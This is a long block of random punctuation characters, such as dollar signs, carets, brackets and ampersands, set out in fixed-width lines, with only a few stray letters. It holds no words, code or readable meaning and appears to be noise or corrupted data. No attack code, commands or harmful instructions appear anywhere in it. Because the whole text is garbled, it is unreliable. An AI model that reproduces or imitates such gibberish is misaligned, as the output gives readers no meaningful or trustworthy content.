]*$[$^$^+%&*!&[(%(^+&{+&]+*&$_!+{)#]#}{+***)+}&@%!^{{@+#^&*$)&^_&!@!#%^%!@]){{+]
@)$%{&+{@)+)&^&*(!(%^_&+]%_)]_+!)@!)$$@}(@@$#^[%$(&@[(($}!&^#]()[%){]@]$*[{)&%})
!+!{%[)[(%$#[*)]@!^{#^@}&]&([^*{$#$&%#@][)^+!%@]]]$$(!$@[&]{%%!^&(+{!&#*_]$@_$^]
$*&}_&$!]%+[){+{@[(&!%@&$*@()&!@}@^!#]!)#^*{)^}}+@[[!_}@![$]!((&+]}}@%^]@[]])%_&
_@*!^_%}@[$)#%($+!]!)(!}]+%!+*{%]$^*][%({]@][}!%_*)^]}+)[[)(!&{]$(^%#_$!#!#!}&#(
*!]((**^))({^]{#@}$_$^*)$+)!]}()^+^!_&{][%%^#}{#}_)&}*&@(@%[##@*(}+@$_#$%)_{(!$[
^!!+)*^^])[+{&++{[[##$**]]%^]_+*%*@%!{)@%(}*!#]@$]^@)(%$$+$#$[^_${)&_)!}{[+&[@}&
(]!@^](!![@#}%@][{*}$*!]{(!#})(&^^@${&)]$^(#}{***%{!&[%)!#%(%+(_@}^}*{^!${[)#}_#
%[_!#]_+(!%[&]+^%^&![^+##*&{_*[($#[@$%&${}_[_%)_*_&{#*#[!)&_#^}&&@#))]+{(&$##**+
^_*($_^)]#!%{]_[!@(&$}($!_#&!_&^%&((&#*{}[$}&@{&(]#&_+*}&)#^}([{$&(]^@@}]%))(&@[
)$)@+[(}(*%^%$](_)#*_+*%#+{{&^@*!@&([#}{+_#{(@&_%}(]]}^_}+^+@*)_(&}]$($&+@]&[!@{
{)*]%({&%^@))_)&(}*((_]&$+&(}_)]{$^+]$+}{[#[#$%]#(%+_(@*&!]@)&*${@#+&_#^_}+&@*&#
}&[)}${@([!+]$}@%(%$_)&#{[]@_*@$}$+!$)@]%@*}%^}{**#{]!$]{$%%))!{((^)[}+]}{{&*$)_
_[+%{{@)@(!*_]#]((^+!!{_&]^%[^!^)%]$]#_^%$^#{}^}+[]}@$)}*@$)*{![})}([_{_*&[[{{+#
{&@[@+(*@(&&^%*[_${%{^}[[_]*)[!%%)$)])]^#+&}#[^(}]{[$%^^)$$&_(_#)@_)!#}*)+]}{!!%
&@&!##}_]#[*^^&&^$!#^%{%{#$%]%}{%^_+&%_]#__*&*{%!(]#)^*+&@#[$)}}{%^}!#%)[{@!{&[^
$]$++##!$*((#[(+[&)&^&&{{{)+##)_${{(!^*{)^!)}%}@]#*^%_@@*#[*(_#((_}*}]&+}$+)[$)@
@{!%#&{+$]#%]!*[{$![%(^!$$$$+{!@!#+&]%%^_(@}^*@%+&[!%$[})($(([{@#]*{_[@#&(![{$_)
${([*!{!)(%&]*%@{^_%[__#%[^%({[][^{{$%!$[_$@${]!(+*@}$((_%{$$(]](}##[!{@[@_+))*[
^}%${(@^]#%*^#+}^]&#$&{}[[_!)[$[&)}#[$&%])_^)[)!_}{@^^###_#(#!*##[*_+@(!$%@%$)#_
@%%}@$*}(!(+_[&^([]%}(%@@]%_}#(@&$!]$_@^!@}$_{]@#($)$)!{*_%$)]#%]$)_^&@($*}^&_[^
)%}%]}&]$]*#^{]%^$}&$(#&+[[][!@&}$]_]({)(#!@_((^@@%%_]___%]][&}})]{%%}[#@__+%)(%
}_]*$$*_@+])&{$(+*+]!_[#&_)}{#)!^^}[%^+*})!(@}*@}$]))((@$(@[$_{@$^^@^*_%@%]_++(#
$$)*@&[%@((#**]*][{(@+#%_+_++!&[$%&#_#!#{_(^^@[}@&#$[[*!]+^{$]!}+[}$!$!&#$__$%]!
@]_$}*}____$%[)$]#++#!+*&{$$!@%^$*)}{]}}*)^(^%!]+$%_@%}$]++($#&&[](&^%&}!(]@@!)_
}%%*%(#+{@@_&[$+*{]&&$!*}#$$[]%+}@_&)[@+!%{@%()[*{@*[}&%@]#@*$${_^{}^{]]$_+[+)({
)@$)}^+#[$@!+&(@*^}}@{!#[][#[&)%%^#]_$}})_@{$&*&)+^#%}{__)}#%[[%_$[[)}()()^_#$%!
*+$}&_)_@!{(}*{[&!)$[&@^#(@(!#(#!*_}!++#{#(]}!))]!}(#**({]&{)$+)+&$[^!&&[&!^[*(^
#()#![_$)^@+@)[!_({(])+{)@$[$_&+*$%)+[[][+]@^}**((!%!$+&#][_#}$)_@!}[*%)$%@#&(@(
^[&[}#]_}{)#}_[#]+}@$[(%+&${[[+%&%]!&*(^(#)%%[+]@[+]#}#@#]}+_+}__[^$#+^)$$!^!)!+
$}##]]*&#[@()!)#([]@#+)^+{*&$_@_([[]^@_)+$#+)]*@!!]})}__!@##{[(&%![[)[*){@^[@(]+
&]{#%]__@_^$@&+$$@![@_#@[!%_!*{}}^%_]&$$!&&$#^^*[&!#%!&}%&}[^$$*([&(_*{{%{#&{{){
!^$(()[*&{]&&_}]+]#[[^]#}+#+($^&$[^!+$^!}+*[]%+]@]*^)}(%$}(+)^#[@}}[*!@]*[}[]^&_
#)]*%_}[{%[%!^][^^)^(_@$!_*)$$&&#]^##[)[#$$$_&$((_)[{+%[**^#{)%#^^_[]_&(**_(}(&}
)**$}#})*@$@*$^(]+)#^$]!^&]$#!#$+](!%(*^$@*!_]@_@){+(%*^^&*@]%+_([^^%}&%!#@_({+[
)[^[*+${{_)*@)){(}[{{{(@{$_}+@&}^^%)*@*!{(!%#_}!&++%&+_({!{!][)]!}!%[}_{{+@[*([[
[++#[^%_[*+(%)^@@+_+}(#*@!))!%@(!#_*_}$@!$)^($#]([@*)$#*%*_&_!%%[}_}](#$&+)_^[[$
_][[#@%!_})!]@$[}&&#)#_%[!%]*&)###}*#!^{+@[!%^)[%{}__]+%%{&)}!$!}}*&{{#++{_@{(})
)@%}{&]%!*#_#]+[][!+)[{$!{+*+($&@%&+)&#_&(@}}}}(*$+_((!!$[+{]@])_($($}]]+&)#][@_
@#]&{]$(%}$@^{$@]*%]_*}#}}!]^*&{+{_*$(##{{_^%#!}+^!$_}^)^{]+*@_{{&+)^$[_[[!+)^)^
!#]]({_*[%((+(+%&+&$[]++{!{)})_*^{[$^+(+%({!(@{#(^[(%}*$_**[)+#*&*[_%{*@)_{%(@}#
_+@+_!]#]([[*]}]}#]$)[^+%}+]#@%@&%^%@$(%(^+@$^_$_((*{[&%{}^$[_&_}!%(^$[+%[[}!@@#
*}+^@){^#%}]{!#^]]!#}{{$][}%[*)#^}@![$@%!&)^]^({![#{$*@*%@+_@%@%*)@]+%[[++$(#{@_
)]$%]*[*$(}&}%)}{&(_^}{_*[^}$(+*}(!_{[_!@*[+}*&+^^]]@@{^+]^%}!^{)_}!%%&@)$]_(*@@
!^]}()*+{{}$@[{)+%}[{)$&@[{*%%@(%(@[+%@_^%$+#@[^{*%[++&%*({_]])(@!%!#*$%$}{+{+}[
{})$+)](^}{_&+%!}^&[)_%{(_#[{[[!$*&*&!%*%+)&+++!^#&$%@})$^{(+{)(@{(@]!^!%_)}*#$$
{{}}^)@[$]^%*#])#(]%&)]+}_*{_}{*!]+]%$!!)&%#](*^[)]&_&[}[}$}*&^{@}*(#*{+!%)++*@_
%]{#@+_&$^&}_{(#)*!{%+#+()+]{&[+#]([{%^_)+{!)+()!%*#__##^*!_+((%@_@!+[&![_*[$*}#
}]_)^&{]#@({}+_&!+#_([+)!#[%#{[}+&+(!%*{}^#)%)&^()^{((^^((%{#^&!%_%*+%{)$)^_}$][
#@^%+(!{$}+_+]!#^[]_&!{]_]]]&($}^)}&*}}(#(%&$%*__{)!])[(%)#})$*$_]^($*[^{+(^}}&[
](}}^](^{%!*[[[[_#&)_(#&$[#&&+&^]$])^}((#%_)+%]}@]*{*({[{${!+@[@_%]!(}!$%]*%[}_%
}&_]*_@$!}{}(]#)_#)%[)!+!${}(}_(}^@{_@!#*_()#$!_]%#@}[#{@)!{+{!&(]}][_#%*^#%!{!!
*%&[$$]+@){!{($$*!}]{$!{+^+*%%%!{%^$(!$)%^{(&)!{!^^]#$]%#^@!^(]$$^!^]@&*{)_())!(
+)]!(*@#%$&)]]*))%$!#$@{]$#^@]__!*]^}#(#+$_#+@$+]{)]{(]]*__%&%$_^+)${$$&^{%^%){%
][(%_[])+!(&][#@_%+{##@($($#@}#}!(}*+}_(_[]+{^@@}@@^(&@[(+({+$^^_%*!##]%]#}$({)[
[@%**}){@}}[*!@@)^]*+%{!}&+^*]}&#{*[{}]]^#!%_@!}*+(#*$@@{&}_$^^[_[@[%}]@}{])!+*@
@)(}&*@+*$$*@&&^](+#%+)+@*]_%}*^@*_!#@%)$![*&#&[]&%@}_}$]{}&^{%+{})#%%$[+*#!@{*[
%{#)&_%^(@&)#$#*@+*)$)+]_+#[$((@%[%&!%#!{_^^]{]@%^){(+!)#_^!_[+!*{*)&&*&]#{[[^!{
_*]#*_{$(!(&#@%&+_$&}@^+]+[(@{[))**![&)*&#]]]*)_&+!^#]
{!!!]_}#&+^&)&[^@#)[[}}]@+$#_^@}*%#++_)_&*)#*}][&@*_%_!#*^!}[[}]*}}+*_{!#%(&&)+$
*#+}+^)&)^+&{)^$*}}%@^+@%^)}!!%#+_@*(*]+)+_@#*}&%&*}[#!{@@%&_$)[]$#!}${_+!({]$}[
{!!@(+})(%!{+#+${{})(@*+@@&{@&+&$&&[&&&^###![)&#))@@_*!([^$$%$#[&[&+%}$*)[+$%!*%
@*})[_+@!]#$^^@@$&$)!#[!#[_@@@]_*$}^^[]@_{(%#*[^[#[[}@{__+@!#{[&)@&)^#()$^+*[@!+
}%{^*)@[{#)%)]{_*__^%!@)#[![_}[{(}]@[)]%(&^$+)%_#&_)])[(}(!&[(&(]@@$!&@&!&*!_}&!
#+{@$^$%#]$([**&_{)}#!(((@$#%})+#++(__{%#}+}!)%#^**+!}%+}})#}[@^**!*_+_++&}_^_**
&^+_(}@{((][#&)*__!$#(@_^{{)}_^$[+)!}@&*$$^{&&()%[+!&#&^]}{%{!@{[}$_#[#$[(_)&%&#
{}[_(}*$$)@!{@]{+&!+#@*}_]^[}&%&_^^({}{]!![^}+^(!{+[%})@][}]}[#)}]%{{%&!#^#_^[+^
@&{!+%{&$_#}(*!@]^+!@+!&$)++@[)^^##@+@*(}))%))%{}%((!%_*]!^)(!$^[}](!+){@++]]^%@
#+(][{!##}^{)$##{*^+#}$)+(*%)&&*[!]]^(**@{+[^%^*){{&$&[{}!]_$@]!#$@[(]^%&%$]!%$+
^*_%#}%+[$^#!#*+}_)!%+[)$%}(@+**)(}{$%!{}!!{^!@__{+#+)*]+[@_}+*^(&^}]]@)($(]&_*!
**#$_##%([*#%(*+^(@&_((*)*$%%+_@])}&$%+*$$+{#^&}[#$^*_][}]@](]+#&*[#+*%(&*&(%*[]
^])^%]*+_&{)}^!!@%$#*]*^&{[$^}[$}@%[%%@$+^]#)}^&})#)@]^&+}#!{**+(@+}}&^()$)#%)]_
$()#}$%}@^_()+[!(!*($##%!)$])$+@*[{)&+)&%+}[[}^_#}#*&(^)@[_*^[%$}%)#)#!](+([%*+)
$&$!_]+&)}[_%[%(!!#*}&(][_@}+@*+&&_{_(#%(!!+{&}_@$#^!#&}}@[%_$&]*$_^}%)^_({][}$}
#]{%($@%%]&)))$*^%+]^^&{*&#[))]*(+]*{[!_#[}]{_^%!_{[{%#]}{_#]&^^^)+!^{*_{+[}*#+)
[_)^_}_]&![!+&+_#@*%_#]#!&^!*[#{+%]{{]*%$}!*}$#$_[%})##}}_#}%]_}@*^]*@^(_)}+^^!+
*^]*([&{{#%{[{&@%)%+&!^&]^**}+_!!_(#&}{@@*}({^&!^*)^]%_**((@++#&)@&*%[]]+!$_[*^]
+$!)(%[{]{((_{*}%+_$+&_)^}@@^*+!(_@($&@()]]]&!{_++(^^_{_[!$[*!%@(][(]_{!(}%[*!])
!]%+@*+@#$^)^[^^)&#}#($*#&)}!#[*]%[}#*}_@(]}+*]]^)_(%&}*^+%#*%&{^}%(}]{$+)!*(&&&
+]$^@#_@[{!+^)}}[)_([!%[{(%)@)&^*{!)%&)&!$@]}@([*(^#%@^&))%*[[}_((@&)]+]}}_))(}*
!_}}]@#&({_#@{&))$^@@*@}]*+[*%)+[[{&!!^$($+]#$@)*%*_^{_^%)__!&$+#]#**)+*@+@%#]]{
*_[)+)*((]!{@^!@]%(%@[]^%[&$+^}$$@&{_(!*}$]%_#_!%*++}_])]}$@+&#(]$*[+[)&)([@+])_
[+!%^#%)!#_}]#]]_)]^**_^)^%&$$)%!*!+@#*[^&@^}^[{(@{%(![]#{&%[$]))(}[)^(({_&*#}*}
[+(]+@){$(@!{%$%)$+{$!$$&*^+&@)%}![)*]{^%#(+{}![_&[@]+!@*^}}{})++_${_&%!@((@]{$#
{+@&[}^&%%$&())#!_##$!(&@@*}^[%@$^#*&!@@&_[(!}+{}*&+{**$)}])%()!_&_)!*((^+%)_#[(
_^&!&(%{_%*[($])}%[{@{{^_[$}@&&_)^()({%![#][(}+&^(]&}!*@#{)]{i]%_]%^(&]^{+_([)$%
{&*[$@^{(]@}]%)(@&}&)}_@$}&]{#$^}@@&[]#+!%^]@!]]$+$]#^_]{](^*&!%_!!&}$^&#!}++)_!
^@]]*$*_#+$!^{$&[$_+#^@@}#)(#*&)$#&+#}+{{&@$^%+{++[&}#}[*#]^^()+(#![]^$)^#*])%((
*[)]#!]$]{+([^)%@{^_$!(*@}#@{{^%@}#&##*!_&^{%$_{_+%)#{{!$[&&]#^)+!]*&]{[!^)%}}*%
_{{$%_+*^{+!*!$)}*)_&%@[$*!&*#][!!&#{]$}}]^_$*!*&]&(@%_$*@+!{}^^+()+_$(!]*@)&#[#
(#[@!$[+{_{^%+&}($[^^}${^_[#)({)++&_%*{@+(^+_%!_)%)^+@#(${)*]&!)^{[#%+[*))(${&{#
&$+#])%@_*}{[}$!{#}!^%*)++$]&]!_{_+_]%#&@&$&)*!(]+_+}}]_+#){[^]#^+)$#!)&)[+#[)}}
)*(!%&]*{$+(_()_%$#_{}[]_%#{![}}{(!@{#$[*&(^((*+^(^(_]%{!]}+^)%^{{$**]@$$$_!]((%
(&[${_&)}[$$_{$[]{#{%%!&@(#+%@%)+_}&*##]!&^_[^[*]([*!]]!]{#*!^&$!*)!}_#{_#*[%[^)
[!*@]%*[_^!#{{)@![$+^__[]{($+}}{}[$[]^{+(*(^)&*&#^][@{&@)+^*{%@^)+++&!&[{(@{!]{]
)%$]{()*{)[)}@&@&@%^#{*]@@]&_]!))$^(%@+@+]&}]+{*[]+(!_{]@_[(]_][}}_}@[_}##+@]]]*
+@*_*[&%%(_++!{]*+&(*%%@{!!*%!*^}]}$&}#[+*&+@((#](@(&*{+](#%!%[%]@#+[_+(^[*&[}${
($@]^)!&_*]#{#&}({@](*_{!{*})%}#&#_][%)]$_*&(]_*%]%$(&+$(#+[][*{]&+^+!&^@}$}(}]$
]*%@_+!}&+}_}[%^]#&{{+*%$&_#}#*]&%%})$+]@)+^})[&(+@$)^#)${@_(%!($]}^!{@}){+@!__)
$]&{*%#]_!$&@$(}#^{]!!%^%_#&!$+$&%^_#((#)$@($[+}^[_+$@}_)]*!^$!{^)@&*[[%!_&*$_$#
^+][](^[]^^($_#[+})__}@{{%_%*&_[)!}+[!@&*}}$#%**#}%})_^$^}}&+*}({(]_!*)#[%(!+_%*
)+@%[+#$(+%@%%%_{+&_&_]()$][)(${{@(+}+_$_!+##@@&}[#+!(#+!){))@*+((}@#![!)&(@@)(]
^#!+{_(_$+!!%##{[{]($+@)#&$%)))&[&*!^%+]!#]^#{)][()**$^_!@)^}%$}+_]+{[]*_}[[*)*{
{+]@[!%)@&^^@$%!!({##_#[}[+@_*@]&@[]}${((^[{][]+#%![(_{[*)#}]@{]#(^])_&!%{^!#%{@
_]}]!^_[!)&&&]_(#]+_!_}&&)#$*+^###[**@{}{%^[&#+&__@@@[+t]+&)^{*((@$!$)%]$[{}$}&$
%!+$[(*%](@*!*})!#+*#+(}$(*@*[#]#)[^*#@}*_#%@@+@[!!{*^})_!^&^({(%(%%@(#_(&{__[!+
(#})___!{^@*}#(%#)_]_%{{]+@%${+![^{(*$+)$[&[${)&#%+$![{}(@^+}]#(}@#]}($($[$[+{}(
&}+%*$[(_+{#!+]@)%#)}_+{%&*)#^[$@_@}[^*+_*(!%&#*^@)@%^[@%*$_{}{{%[@^+%[$])])@[!^
+#@$%^@^#%}+)*!+!$%(}](&)##$+&[[#&^*!^$]*!#}{%#{*+&[]$)]%}*[*_)*#@^{%)}{+$^)_{$(
%){!}(#]^_(!^]({%@_@$%*{*@)*#!%$(*_(]!#*#%[*[&*)^[%&$_)!$[_&($]]%{!%&)[(]&{[[[{+
{{@]+](@&@$_^^(*@})$!}{@$_^+{*)[({^}_!#[@$[*%!%^_*@@}#_{[{_@**++)!]!@{_#]&&*{+&$
**^[)[%$_^)*)_%+]&_[)&$}}_]%+%)}^_]#}]__]*!}&#[[##![$[)%+_))_&)$_(@&@}&&{)+#_%![
]}(^#*@^)$$%[%*(({(^]}_$+^%{$#*#^+({)[*}@]+![&%_%&_$#@[$^+@$(##[[$}+*$!@*!{_@})&
}![+_#}%{{_$}}+]+#{]#+$![@(!%_&$$}+^*{^#^^[&&(^^##**$_{+*!]}][}&&%]]*&(}{+@+!]({
!$@+[&@)]_!__})]+]+&{_($!$)#$)&$]&&}{!^$)$}(!@%$%(!+*!*#)+$&_&[[]})^#]{$}&@$^{##
]#%@+!^)$^+&^_{({+[}#()_(!*_@$}}!}*+_[@^{{{#+)%&&&}*{*))+}&[#++{}%@(]_@$![$$$&^*
__}$)$+%$%(*^@)++@!*%]^){]]_}]++$!()&[{*^$%+]+*_{[{$[#*[[%^}]&_[^@^+@@^)#)${$^&+
(}$)][$&}#*_&+%#)(%^){](*]}}]}!+[)##&!^!+{_!@&^[[(#{[&#%$!(#{__}#&@$*}#^*#]@!}^_
!^$!@y{$][%@+^##](_*(##^_{#)$+$*&}[#%&_!+)*@{][_($#_$*{(}_[{+)$[)+{#)+($_]{}!]+#
(#_$!@*+#%+(#@_}}@^!$_[&_&@})}}$(]^]^(_^**@%**#&^+@[!]^+}+&+&[^()+$*$(}$!%@!({^[
)]*{(%#[_%{}(+!##[)%&!((^[}&(!#^!([)[&!_)(%&#@)&*$+]&!]^#!!^$*^$!(_+![]*{!${@%+)
^#)$#{}]%%$(*}(]#&&$)@_&+)%}}*(([]![$!!^&[%!{&^(&@&%$)@{!@}!}$_*$%+#]{])@!@)@_)]
}]{_}!%{^$))&_(+}+#&+*&+!{_*^)[}(((}_@(]^)_}!]}&}{&[((}@{+(([{])_}^(@^+^+^}(!)&]
_%*}_!^#[*$_+]@&#+{*@*+{)]^^!](]_@^}#^^%(*+]@^@]$*%_$#^*@[$]]_)]$+$+@*{$[}[%*{+)
(&{@%^+*}^(^&_+$#(@$[#@@(){!($)^)!])(_&%#*&[@{]{]#@(]%@}{${[})($+++@*${+&}(^%)+*
{#]!#)]*&@)+#[+_)@&}+]+_*}}]*{{%^!+$+#$(%!^**!])%*_}$]!)({$^_^+]*#{(_*[&!(*))#@&
@^%@@}]]}%#%]{{#(#**[#(_#(#$]]*)_*#+[_#+}{&!]@&[]+{*^]!%^*_@)]^%#++$&@[)([+}!*](
&%+(&])^[)@$](**}]&}$]&%^]@)[&(*[(#^{$+^]@[%![_{[#_[){_$)!%![]^_%*$!@+{[&%)!_#((
$)[__^{%_!]_#[&_$(!)!_&}&$$}](]%{^(&{%$!]+[+_^+{*[@+*+%[$@&#+#$*}&{@%##*@(({)_(]
}_)[^$}^{[$@^$@$&##)@[#$&$&_@]@{_][{}!(+[!+@%&^&[%&${()@@_[&+^^+{)#^#)&%_]@{$&(*
{()}$]!%*+{[[}!+][_*!&]{%+)!^)!*{{})_&[*[})+[(@!__!{!]&{^@%!@]&[&^}+#[{_}@!+_*{&
^[%#!^]+(*#&))([%[%$_[#_+{{_%!#&)^&#)#!](+(@!(}}*#(&&+%!}@]%@#$*_[$](#[@#[_^+(%{
@#(*!__{)_#^!{!&%_*@+*(&[^_(*$#!@_*}#+$_*${@!}*]!}@)$^@_@{^(++(%({[#$)!}!##%]&[{
!(+}(*!(&_[}}{}+#{!#)_[!)&))%%#}_!]${*}@})_)}%+&#$]&(^*[^+&{)}+@((&]])%$@((_(^$[
_@$)[[+(!@]_()}*]*+[{&@&[##}[&]%$](+*{]!%)]_&%^$+%_@!#&+@[(&{){)(]+[]{)!^}+!}{[$
{)@_&{_[^++^{[%*!(]]@_]}_})(%+_#!+]$$_&!+*[(])$(!^($)}^+{&!&__+_{@+}[((&%)$][^{&
*{_%#&${{!@$)$(@%{{*%[+[*@#$[@_{}{[#($}}_)%)&+*]((}*)+_%#{%]_$]%][!+[+[%[@&&){!@
(&(+*[($}**}$^_!@]_{%#{](]@{!#&&&)[$!_(#(#$!*![##!$_!*{{$@@*_!#[%)}%^%(%#$@(}+}$
_#@&({+)+}^*]^!^})[(^@)*+#@]%_(**_+}###[_}]*$${]&_[&{[*}+@#}&^{]_!&#{%())](^@}%*
$[%@##)(@__+{#@^_$}}$)}]#^^@#&_^++!$^^%%#($+]&%&+]}^+_@%$})*$^*&*+[##@_{(&}@^*]_
_$_[@%#[+***&@%!^{}!$#}](_({@]]{)^$]^*[*]+}}!({)
[%%(@_${[(#@%*_+^]{}+^{}!)&#}*#%(##))%(+[+@!}$^}](!_$%}$&([#%}[##*[#*]{$^#*(^+[^
}!&]!%!+@){](^(*}^_!$%]^[&*)_^}!@]*+((!^+_$+]_%[@&+(*@}}+}!]#})!*}!)+@}^}_+*#+^!
)#$_#{&)!$@]@@[#(!]^&^+!_+@^!&[*!)(*)*&[{_@%$!__!%%[#$(%#(]$$![[@!^#%(_)#!{%]]*[
+^$@$&!^%+!^[_}&*$__@}{])%)((}_^)(%^)$@}#)]_)[)#{!}*^&&__}!{&)]#_)[$$%@{@$&*@)#{
^#{}%^&]+}(%$@+{*^})]@^#^#]@$%([[#^(%[)]%#$}}*_$]}^]*$@#%$#[^[[%__*#@)(_![{${{{$
^*{##%*!!&]{_[$#_]!&{(!@*(+%*[%_($]*#)($)%][^]#+}[+_{})@)}*&(]{(&(}%%@(++$}@(#[_
}(#[(@])[+(^$}}+!){_&*)&&$((+[+)+#&]!@^+]}[#}$!*$_}_$__@^))$*){%!@}_){(@^($)_&^%
]))^)^][&$+)[!(#!()(&[%(&[@$*!{]+{{$(#^&_!!%@)%[@_(+^]#@$]#*!$%#()@++&}+%[[_#(*]
#!&&([_}[+]]*%_$+(^[^)$*#{+{!$%}_*!%_([{*^{*(#}&[$@[[_^$&!()*(({]##$@@&@$}&#{#@!
&_@+){!($$(_}++&+*%@[%+([)(}!%%{$_{@$[*}_!^)#+)+{*&)^]+[$^))+{(++%*^!]({!&^}&_(_
[&^#)(&)[)}[}}+$]*)+)&_{%}(!}(+%(]+*#([+*##{()_(}}[%[]*]{${+(&)}]){)_^}[]()}#$@%
]_}(_]&}[&#%!{+@(##({^[+#_)]@!$]_@+[[%*_)}]([$}}*+#$+{$+_{}^][]{!^!#^{{_$}$(%)+[
[^%]]+@}_%){$%&[@!*{){)%##(_{!#(![#*(^@{$$))#}@_]{#_@{)]#!]!#&^]!@^_++(^($)^#^%}
*($%[*(++@_([!@)%&%^])&&]_%*_+)$[+)){_[)+*+**)][_@@!]&[%@$(!#__@]+_{$@+*+)_[%^}[
(++$%*@_](}_(+!}!(%!*([&#[$@]#}+@@%^[]&^[%]+[{!_#+{(*)!*+@*}+(+!*+#@[@#!)#*[]#%&
[_%^!#%_]$}#+[+&[@)_#]+$%{]*_%#}}&[}#*(!))@_+@$}$#[]}*@%!}^^&$%&]_@}!!}}{_{&#_&}
$@$+(*!{{{_}!+[}$+_)_++$+}$({$^!*_@]$&^${%$}_!%_{*_[$+)@%+{%&_^%%!+_([$_]+&&%_%[
*]+[!%[^_*+&*$(&@@(+)$!(!#)}!}{+*)_^_*^(}^}+}][&*_@#%{^!&{)%_](**_%&%!!{${#+@$#^
%)^!^$!$#*^]$*}&{]#{*]!{%%+_({%)%+}&$%+_(}_^(%{*++!@^}*_{([[_#_++@+(*&$(%+)+$}[)
[!}&#{$+_@&_!}){{$(}[{*@%[(!@]!{&&%$!#[[(){%#%_^#_{_!}$!{)$$#&_^){[(#&$_^{%$!^}!
((*&@}}&$)!*@$}*^!]+]))!!*%^[%(+[{!(_%]&^$[#!#]{+$+]*}[[*@&&!+^#%!})&$]{*(&+@&+^
{$!#&$[$}$!][@{%@$$$}([{)(]*+$!}$*$&+@%[$*)#]}_&_#@{^#@!@@%+@([)]}{!_[@^+^%]{){&
$@(%@)^]*]&%%_%*#[@(&]])#$#!$%$}@{}!}[[@}#@#](@)$%{&)}[&][[_%%(!!(}%([[){^$@[@[}
%#**%{@_)%{@{*[@#(+&+%[]{+&{}_*[%#!!**+{{_^+@[[@^}[$@(}@[${@@}!*@!(%{}!#*_[&^@[%
)]!)(*(@]#@{%_*+@_&(&*$+&$$$$)+}+@$&)@}}+_*}!(){@@@]%]$}@%@())$^]!]*{!^!$&!([*%*
{]){#}@!+*%(#((($+(_++)*$%#!)$*[]_%)]&}@_{#]]&!##&$$)&^@&{*!{{[))(*{([^*&$})@$*{
}]]}%}!!*_%_(^%{%&*)@^&]]_!*[*{[^%[(]%]*!+])[*(!}&^)]#{&&%*)$[(]#(*@^}[(!](+_[%[
%@&!&*_]^#*_$]^$}^]##+_}*@)%{@[$$#)$*_&)+()@*@&^_${[@%&&$[!+_)#^_${+!&{[#^^(*)&!
#%(^&!+$@!)_*##{[&]^+}(](+%#*%#&##!(]%)!($#!^^)!(_$*!_]&%@#}**+@&+])[%$%@$!]$[!@
%*}_@^$%^]$&#{+]!({[@}&{+@]!{&!&)#((&&(!]!_$}_!!(#}#&&[@_]+%%[_]!}%###*&}&]^^[[_
}[}^*{+]@_)]@)_#*+]+$}+]{]!+&}}}@@)&{*+&#*}#*)__*@@!]!]}}#{!$}*@@@}#^{{!}##^!&@!
)##!]#$[@!{*%+)*#+__)_(%}^*#&[*}{_@&+[]_*[[}[@{]][@)#[%(*$[*{%@]]#${)!%_!*}+]$_)
})_%())]{(]^+)[+)#^{*_^([%]&*+_)][%^&*)++^&{]+]$&_+[@!%$_([&%%!@!%*)+(}]+)()!#}{
(^*&^{[!#$](%_!_**!}$$!&[^{(!#{#@_&^]{)[*+^](!&!(@^(@!@]%+]$(#%_}+)$@}&!#&&{^*{]
+%[!{!$((^_+&]_!@^%#_+}({^^}*{{%]^@&+${%%^[*!#}_(_&&)!$}!_^{[(&$][(%_+$^&}#&((#^
!&]{[+)@}%![(#*)$+$#){)[^+@^_)]%$#}!&}&]$&{*&[$!}%$]&_}[*$^)%&{]}]![[^_}(#{^*!!&
*&[(_{{+}($[}$*()&}$&#%!%#)]{@&$)[}&{&_%_[(((%@{]_*^(!+*[[(*}@]%_}])^%+%&([]}{*&
+![}{([&]$^[+{*]()&!&@}^#+][(!^*^+^&&$#]_{@$+@[({]&)!&)))&#*(%+*&}$^_*+_&@[}{}%^
{_$^+%+@(&@[[)}*@{!_$)@((_*^_$${*#{_#{%@()[@(+$#[)!#*^!(}{!@[+%[&_%()+#%%{)}^)$*
&(@%[{^&%^({(@$*(**$}+)%}&)!+$[((&)@]@@+{{]])]]^$#(@%)!(&&]+#+[&[&}$__$$@$+]@{*#
{]@]@*)!])})!}!%[+$)@)]](}*&!}]+![##]])]_[](+${+]_*@)_^{}&^)_*{*]#[]*{+{)(*&^_#_
&[#_)$){$*!)!){$*$(]{]_&%%}$@&[**+![#{$}]@$$[@@]@{[#])^$***+_#%@$%]{_+}&*!&_%&()
$]*&[)#(%^{]%^)])@#{!^@(@)#+}{$}@_${_(_}[^[+#*&^{%!%+$)){_]*%+(@^{_*#$*(!)[*[&))
^&+^@!!!+])*@__%__@${%#_(^@@*}!&])[#%_!%}!%{@}#!)(_*^@*_)$&_+!#$)&}#_&$}%!{^!#&^
)_)$}%^+_!*$(@%}}@)})}_&{!@^^!&_]**!*[[()]*%(]}!#))+*@($%)+){!#@^+}@((*@[}&%#{_+
{@^+!([!)_!+@+}_+^!%_([(+)($@&@##($_&!@##$%+$@#[_[$!^&*])!&(_]*]}&)[(((]}%[@&[^@
]{*+&_)#!(@&#+((&!%!%}^*&[]#$*^}}$]&(&_{}+_}$%#&%[&}*)*]]&+!_)#[^+%_*}]])+$)%!]{
]##]^($^_)}[}[[)}{++}+(^%^!}}%)&[}${{*+&+@%}&(})@)+%!%_*(*[!+$_)[!#!@[%)@^}(#*%+
#]$]%^)$!{]&_[%%*}_#_)__^[^^#(})}&^%%%_&}&$_$!&{![*^}#+@!*){%)+!]_&*[$)%[)!{]!#^
[{*__(+#_)+^%(%]_%@[++[((^*($_*(_!*+$+[&!(*_[{{&}&%*%@#&%[#*_[_&@&]__+{@$)^%_#$^
@@%!+%+]_{{}*{[]+^*$!]&[$+_}{])]$]*##__##{#!!&)%!@^!!*+#}_{^)%{^*(}])]@$_!__)!#+
@%({&[^${{_{}#([{+{]!@((&*@!)*[}$}(]%+#@$%%&!%&]@$(_][#)))@$+}@%*#^^@%&]}{()%%^!
#&&)++!(}{]}*}}!}(@*@!]^%*!$_[($)!_^^$_[#!(%[!}#&$)@$}#$))&)[##**@](]]$)}}[^@@^#
}&&){[$${&}+[+%_}!#^#%{]_%#%*&_}}+]&_$*!&&][_%!]_*+#^!]{}_!@(}(*(^^*__+$#@#^]*%%
%]^}!_{}!)%!{)%+[___]]$](*^)))*^${)^^$_&[)&}*}($#{#^^#_@[[+[^{{[*__{%$^$}*{{+#{{
$%&+])(^^*$(}#*[$_#%$}!!^%&($}!!(]*{!}(!_&{##[{!+]&#(((%@]!($#%$^@(%))@_)@}*})+[
